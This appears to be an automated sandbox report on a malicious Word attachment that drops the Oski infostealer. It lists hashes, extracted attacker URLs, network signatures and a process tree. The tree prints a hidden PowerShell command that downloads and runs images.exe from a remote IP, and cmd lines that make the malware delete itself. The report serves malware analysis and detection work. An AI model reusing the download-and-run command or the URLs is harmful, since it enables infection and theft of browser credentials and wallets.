Analysis
-
max time kernel
148s -
max time network
87s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
03/08/2021, 08:39
Static task
static1
Behavioral task
behavioral1
Sample
T31597377-Confirm-20210802-100016-Email-5007377.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
T31597377-Confirm-20210802-100016-Email-5007377.doc
Resource
win10v20210410
General
-
Target
T31597377-Confirm-20210802-100016-Email-5007377.doc
-
Size
229KB
-
MD5
5dda83e206429216662517f5f4ba7718
-
SHA1
abbd782fa3cd388e66e7739b65abddfcaf0071fc
-
SHA256
190a90d648e64c0f6c80a36bf00c5f2fdb8247260f5f38dfc13895b28f1c7fc2
-
SHA512
c8d0e5461219e832a376396bd5270b1380cca65515a453c2c911f3c9355aa86a855d07d26ce015dd7ed106e3b0617b98d2a951cfb771187274a48d0231a300c1
Malware Config
Extracted
httP://185.230.160.197/images/images.exe
Extracted
oski
http://2.56.59.226/www/
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 676 288 powershell.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1504 288 powershell.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1688 288 powershell.exe 24 -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 676 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 1568 images.exe 1936 images.exe 1404 images.exe 1504 images.exe 1660 images.exe 1456 images.exe -
Loads dropped DLL 11 IoCs
pid Process 676 powershell.exe 1456 images.exe 1456 images.exe 1456 images.exe 1456 images.exe 1456 images.exe 1660 images.exe 1660 images.exe 1660 images.exe 1660 images.exe 1660 images.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1404 set thread context of 1660 1404 images.exe 43 PID 1936 set thread context of 1456 1936 images.exe 44 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString images.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString images.exe -
Kills process with taskkill 2 IoCs
pid Process 888 taskkill.exe 936 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main images.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main images.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main images.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 288 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 676 powershell.exe 676 powershell.exe 1688 powershell.exe 1504 powershell.exe 1688 powershell.exe 1504 powershell.exe 1568 images.exe 1568 images.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 1568 images.exe Token: SeDebugPrivilege 1936 images.exe Token: SeDebugPrivilege 1404 images.exe Token: SeDebugPrivilege 888 taskkill.exe Token: SeDebugPrivilege 936 taskkill.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 288 WINWORD.EXE 288 WINWORD.EXE 288 WINWORD.EXE 288 WINWORD.EXE 1404 images.exe 1404 images.exe 1568 images.exe 1568 images.exe 1936 images.exe 1936 images.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 288 wrote to memory of 676 288 WINWORD.EXE 31 PID 288 wrote to memory of 676 288 WINWORD.EXE 31 PID 288 wrote to memory of 676 288 WINWORD.EXE 31 PID 288 wrote to memory of 676 288 WINWORD.EXE 31 PID 288 wrote to memory of 1504 288 WINWORD.EXE 33 PID 288 wrote to memory of 1504 288 WINWORD.EXE 33 PID 288 wrote to memory of 1504 288 WINWORD.EXE 33 PID 288 wrote to memory of 1504 288 WINWORD.EXE 33 PID 288 wrote to memory of 1688 288 WINWORD.EXE 35 PID 288 wrote to memory of 1688 288 WINWORD.EXE 35 PID 288 wrote to memory of 1688 288 WINWORD.EXE 35 PID 288 wrote to memory of 1688 288 WINWORD.EXE 35 PID 676 wrote to memory of 1568 676 powershell.exe 37 PID 676 wrote to memory of 1568 676 powershell.exe 37 PID 676 wrote to memory of 1568 676 powershell.exe 37 PID 676 wrote to memory of 1568 676 powershell.exe 37 PID 1688 wrote to memory of 1936 1688 powershell.exe 38 PID 1688 wrote to memory of 1936 1688 powershell.exe 38 PID 1688 wrote to memory of 1936 1688 powershell.exe 38 PID 1688 wrote to memory of 1936 1688 powershell.exe 38 PID 1504 wrote to memory of 1404 1504 powershell.exe 39 PID 1504 wrote to memory of 1404 1504 powershell.exe 39 PID 1504 wrote to memory of 1404 1504 powershell.exe 39 PID 1504 wrote to memory of 1404 1504 powershell.exe 39 PID 1568 wrote to memory of 1504 1568 images.exe 42 PID 1568 wrote to memory of 1504 1568 images.exe 42 PID 1568 wrote to memory of 1504 1568 images.exe 42 PID 1568 wrote to memory of 1504 1568 images.exe 42 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1404 wrote to memory of 1660 1404 images.exe 43 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1936 wrote to memory of 1456 1936 images.exe 44 PID 1660 wrote to memory of 512 1660 images.exe 45 PID 1660 wrote to memory of 512 1660 images.exe 45 PID 1660 wrote to memory of 512 1660 images.exe 45 PID 1660 wrote to memory of 512 1660 images.exe 45 PID 512 wrote to memory of 888 512 cmd.exe 47 PID 512 wrote to memory of 888 512 cmd.exe 47 PID 512 wrote to memory of 888 512 cmd.exe 47 PID 512 wrote to memory of 888 512 cmd.exe 47 PID 1456 wrote to memory of 784 1456 images.exe 48 PID 1456 wrote to memory of 784 1456 images.exe 48 PID 1456 wrote to memory of 784 1456 images.exe 48 PID 1456 wrote to memory of 784 1456 images.exe 48 PID 784 wrote to memory of 936 784 cmd.exe 50 PID 784 wrote to memory of 936 784 cmd.exe 50
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\T31597377-Confirm-20210802-100016-Email-5007377.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Roaming\images.exe"C:\Users\Admin\AppData\Roaming\images.exe"3⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Roaming\images.exe"C:\Users\Admin\AppData\Roaming\images.exe"4⤵
- Executes dropped EXE
PID:1504
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Admin\AppData\Roaming\images.exe"C:\Users\Admin\AppData\Roaming\images.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Users\Admin\AppData\Roaming\images.exe"C:\Users\Admin\AppData\Roaming\images.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1660 & erase C:\Users\Admin\AppData\Roaming\images.exe & RD /S /Q C:\\ProgramData\\943401550568339\\* & exit5⤵
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 16606⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://185.230.160.197/images/images.exe','C:\Users\Admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\images.exe'"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Roaming\images.exe"C:\Users\Admin\AppData\Roaming\images.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Users\Admin\AppData\Roaming\images.exe"C:\Users\Admin\AppData\Roaming\images.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1456 & erase C:\Users\Admin\AppData\Roaming\images.exe & RD /S /Q C:\\ProgramData\\496765114840226\\* & exit5⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 14566⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
-
-
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2024
-